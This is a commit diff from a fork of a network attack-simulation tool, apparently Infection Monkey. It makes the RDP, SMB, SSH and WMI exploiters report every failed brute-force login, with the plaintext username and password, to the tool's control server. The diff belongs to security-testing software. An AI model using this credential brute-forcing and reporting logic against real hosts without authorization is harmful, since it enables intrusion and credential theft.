p15693087
/
monkey
forked from p15670423/monkey
1
0
Fork 0
Code Issues Pull Requests 1 Projects Releases Wiki Activity

Added functionality to report all brute force password attempts even if unsuccessful.

This commit is contained in:
acepace 2016-08-09 00:23:18 +03:00
parent d75ce529ab
commit 8f1669dd44
5 changed files with 25 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
chaos_monkey/exploit/rdpgrinder.py
View File

@ -13,7 +13,7 @@ from model import RDP_CMDLINE_HTTP_BITS, RDP_CMDLINE_HTTP_VBS
from model.host import VictimHost from model.host import VictimHost
from network.tools import check_port_tcp from network.tools import check_port_tcp
from exploit.tools import get_target_monkey from exploit.tools import get_target_monkey
from tools import build_monkey_commandline from tools import build_monkey_commandline,report_failed_login
__author__ = 'hoffer' __author__ = 'hoffer'
KEYS_INTERVAL = 0.1 KEYS_INTERVAL = 0.1
@ -295,6 +295,9 @@ class RdpExploiter(HostExploiter):
exploited = True exploited = True
host.learn_credentials(self._config.psexec_user, password) host.learn_credentials(self._config.psexec_user, password)
break break
else:
#failed exploiting with this user/pass
report_failed_login(self, host, self._config.psexec_user, password)
except Exception, exc: except Exception, exc:
LOG.debug("Error logging into victim %r with user" LOG.debug("Error logging into victim %r with user"

7
chaos_monkey/exploit/smbexec.py
View File

@ -6,7 +6,7 @@ from exploit import HostExploiter
from network.tools import check_port_tcp from network.tools import check_port_tcp
from exploit.tools import SmbTools, get_target_monkey from exploit.tools import SmbTools, get_target_monkey
from network import SMBFinger from network import SMBFinger
from tools import build_monkey_commandline from tools import build_monkey_commandline,report_failed_login
try: try:
from impacket import smb from impacket import smb
@ -88,9 +88,12 @@ class SmbExploiter(HostExploiter):
host.learn_credentials(self._config.psexec_user, password) host.learn_credentials(self._config.psexec_user, password)
exploited = True exploited = True
break break
else:
#failed exploiting with this user/pass
report_failed_login(self, host, self._config.psexec_user, password)
except Exception, exc: except Exception, exc:
LOG.debug("Error logging into victim %r with user" LOG.debug("Exception when trying to copy file using SMB to %r with user"
" %s and password '%s': (%s)", host, " %s and password '%s': (%s)", host,
self._config.psexec_user, password, exc) self._config.psexec_user, password, exc)
continue continue

3
chaos_monkey/exploit/sshexec.py
View File

@ -3,7 +3,7 @@ import logging
import time import time
from itertools import product from itertools import product
import monkeyfs import monkeyfs
from tools import build_monkey_commandline from tools import build_monkey_commandline,report_failed_login
from exploit import HostExploiter from exploit import HostExploiter
from model import MONKEY_ARG from model import MONKEY_ARG
from exploit.tools import get_target_monkey from exploit.tools import get_target_monkey
@ -72,6 +72,7 @@ class SSHExploiter(HostExploiter):
LOG.debug("Error logging into victim %r with user" LOG.debug("Error logging into victim %r with user"
" %s and password '%s': (%s)", host, " %s and password '%s': (%s)", host,
user, curpass, exc) user, curpass, exc)
report_failed_login(self,host,user,curpass)
continue continue
if not exploited: if not exploited:

7
chaos_monkey/exploit/tools.py
View File

@ -415,3 +415,10 @@ def build_monkey_commandline(target_host, depth):
cmdline += " -d %d" % depth cmdline += " -d %d" % depth
return cmdline return cmdline
def report_failed_login(exploiter, machine, user, password):
from control import ControlClient
ControlClient.send_telemetry('exploit', {'result': False, 'machine': machine.__dict__,
'exploiter': exploiter.__class__.__name__,
'user':user,'password':password})

8
chaos_monkey/exploit/wmiexec.py
View File

@ -6,7 +6,8 @@ from tools import build_monkey_commandline
from model import DROPPER_CMDLINE, MONKEY_CMDLINE from model import DROPPER_CMDLINE, MONKEY_CMDLINE
from model.host import VictimHost from model.host import VictimHost
from exploit import HostExploiter from exploit import HostExploiter
from exploit.tools import SmbTools, WmiTools, AccessDeniedException, get_target_monkey from exploit.tools import SmbTools, WmiTools, AccessDeniedException, get_target_monkey, report_failed_login
from impacket.dcerpc.v5.rpcrt import DCERPCException
LOG = logging.getLogger(__name__) LOG = logging.getLogger(__name__)
@ -49,6 +50,11 @@ class WmiExploiter(HostExploiter):
LOG.debug("Failed connecting to %r using WMI with password '%s'", LOG.debug("Failed connecting to %r using WMI with password '%s'",
host, password) host, password)
continue continue
except DCERPCException, exc:
report_failed_login(self, host, self._config.psexec_user, password)
LOG.debug("Failed connecting to %r using WMI with password '%s'",
host, password)
continue
except socket.error, exc: except socket.error, exc:
LOG.debug("Network error in WMI connection to %r with password '%s' (%s)", LOG.debug("Network error in WMI connection to %r with password '%s' (%s)",
host, password, exc) host, password, exc)